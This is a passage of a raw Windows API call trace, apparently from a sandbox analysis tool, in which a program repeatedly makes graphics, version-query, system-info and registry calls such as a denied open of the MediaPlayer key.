CombineRgn (hrgnDst=0x1045b50, hrgnSrc1=0x240401d9, hrgnSrc2=0x220401dc, iMode=4) returned 2 [0091.434] CreateSolidBrush (color=0xff) returned 0x2105b4e [0091.434] CreateSolidBrush (color=0xff0000) returned 0x1105b51 [0091.434] DeleteObject (ho=0x1105b51) returned 1 [0091.434] DeleteObject (ho=0x220401dc) returned 1 [0091.434] DeleteObject (ho=0x240401d9) returned 1 [0091.435] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.435] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.435] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.435] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.435] BeginPath (hdc=0x0) returned 0 [0091.435] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.435] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.435] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.435] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.435] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401dc [0091.435] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401d9 [0091.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b52 [0091.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b53 [0091.435] CombineRgn (hrgnDst=0x1045b52, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=1) returned 1 [0091.435] CombineRgn (hrgnDst=0x1045b53, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=4) returned 2 [0091.435] CreateSolidBrush (color=0xff) returned 0x2105b51 [0091.435] CreateSolidBrush (color=0xff0000) returned 0x1105b54 [0091.435] DeleteObject (ho=0x1105b54) returned 1 [0091.435] DeleteObject (ho=0x250401d9) returned 1 [0091.435] DeleteObject (ho=0x230401dc) returned 1 [0091.435] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.435] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.435] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.435] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.436] BeginPath (hdc=0x0) returned 0 [0091.436] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.436] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.436] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.436] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.436] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401d9 [0091.436] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401dc [0091.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b55 [0091.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b56 [0091.436] CombineRgn (hrgnDst=0x1045b55, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=1) returned 1 [0091.436] CombineRgn (hrgnDst=0x1045b56, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=4) returned 2 [0091.436] CreateSolidBrush (color=0xff) returned 0x2105b54 [0091.436] CreateSolidBrush (color=0xff0000) returned 0x1105b57 [0091.436] DeleteObject (ho=0x1105b57) returned 1 [0091.436] DeleteObject (ho=0x240401dc) returned 1 [0091.436] DeleteObject (ho=0x260401d9) returned 1 [0091.436] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.436] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.436] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.436] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.436] BeginPath (hdc=0x0) returned 0 [0091.436] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.436] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.436] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.437] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.437] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401dc [0091.437] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401d9 [0091.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b58 [0091.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b59 [0091.437] CombineRgn (hrgnDst=0x1045b58, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=1) returned 1 [0091.437] CombineRgn (hrgnDst=0x1045b59, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=4) returned 2 [0091.437] CreateSolidBrush (color=0xff) returned 0x2105b57 [0091.437] CreateSolidBrush (color=0xff0000) returned 0x1105b5a [0091.437] DeleteObject (ho=0x1105b5a) returned 1 [0091.437] DeleteObject (ho=0x270401d9) returned 1 [0091.437] DeleteObject (ho=0x250401dc) returned 1 [0091.437] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.437] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.437] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.437] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.437] BeginPath (hdc=0x0) returned 0 [0091.437] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.437] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.437] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.437] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.438] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401d9 [0091.438] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401dc [0091.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b5b [0091.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b5c [0091.438] CombineRgn (hrgnDst=0x1045b5b, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=1) returned 1 [0091.438] CombineRgn (hrgnDst=0x1045b5c, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=4) returned 2 [0091.438] CreateSolidBrush (color=0xff) returned 0x2105b5a [0091.438] CreateSolidBrush (color=0xff0000) returned 0x1105b5d [0091.438] DeleteObject (ho=0x1105b5d) returned 1 [0091.438] DeleteObject (ho=0x260401dc) returned 1 [0091.438] DeleteObject (ho=0x280401d9) returned 1 [0091.438] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.438] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.438] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.438] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.438] BeginPath (hdc=0x0) returned 0 [0091.438] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.438] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.438] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.438] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.438] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401dc [0091.438] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401d9 [0091.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b5e [0091.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b5f [0091.438] CombineRgn (hrgnDst=0x1045b5e, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=1) returned 1 [0091.438] CombineRgn (hrgnDst=0x1045b5f, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=4) returned 2 [0091.439] CreateSolidBrush (color=0xff) returned 0x2105b5d [0091.439] CreateSolidBrush (color=0xff0000) returned 0x1105b60 [0091.439] DeleteObject (ho=0x1105b60) returned 1 [0091.439] DeleteObject (ho=0x290401d9) returned 1 [0091.439] DeleteObject (ho=0x270401dc) returned 1 [0091.439] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.439] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.439] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.439] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.439] BeginPath (hdc=0x0) returned 0 [0091.439] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.439] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.439] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.439] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.439] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.439] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.439] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.439] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401d9 [0091.439] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401dc [0091.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b61 [0091.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b62 [0091.439] CombineRgn (hrgnDst=0x1045b61, hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=1) returned 1 [0091.439] CombineRgn (hrgnDst=0x1045b62, hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=4) returned 2 [0091.439] CreateSolidBrush (color=0xff) returned 0x2105b60 [0091.439] CreateSolidBrush (color=0xff0000) returned 0x1105b63 [0091.439] DeleteObject (ho=0x1105b63) returned 1 [0091.439] DeleteObject (ho=0x280401dc) returned 1 [0091.439] DeleteObject (ho=0x2a0401d9) returned 1 [0091.439] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.439] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.440] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.440] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.440] BeginPath (hdc=0x0) returned 0 [0091.440] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.440] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.440] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.440] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.440] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401dc [0091.440] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401d9 [0091.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b64 [0091.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b65 [0091.440] CombineRgn (hrgnDst=0x1045b64, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=1) returned 1 [0091.440] CombineRgn (hrgnDst=0x1045b65, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=4) returned 2 [0091.440] CreateSolidBrush (color=0xff) returned 0x2105b63 [0091.440] CreateSolidBrush (color=0xff0000) returned 0x1105b66 [0091.440] DeleteObject (ho=0x1105b66) returned 1 [0091.440] DeleteObject (ho=0x2b0401d9) returned 1 [0091.440] DeleteObject (ho=0x290401dc) returned 1 [0091.440] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.440] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.440] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.440] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.440] BeginPath (hdc=0x0) returned 0 [0091.440] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.440] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.440] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.440] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.170] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.170] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.170] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.171] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.171] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.171] BeginPath (hdc=0x0) returned 0 [0092.171] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.171] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.171] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.171] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.171] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.171] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.171] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.171] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.171] BeginPath (hdc=0x0) returned 0 [0092.171] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.171] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.171] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.171] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.172] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.172] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 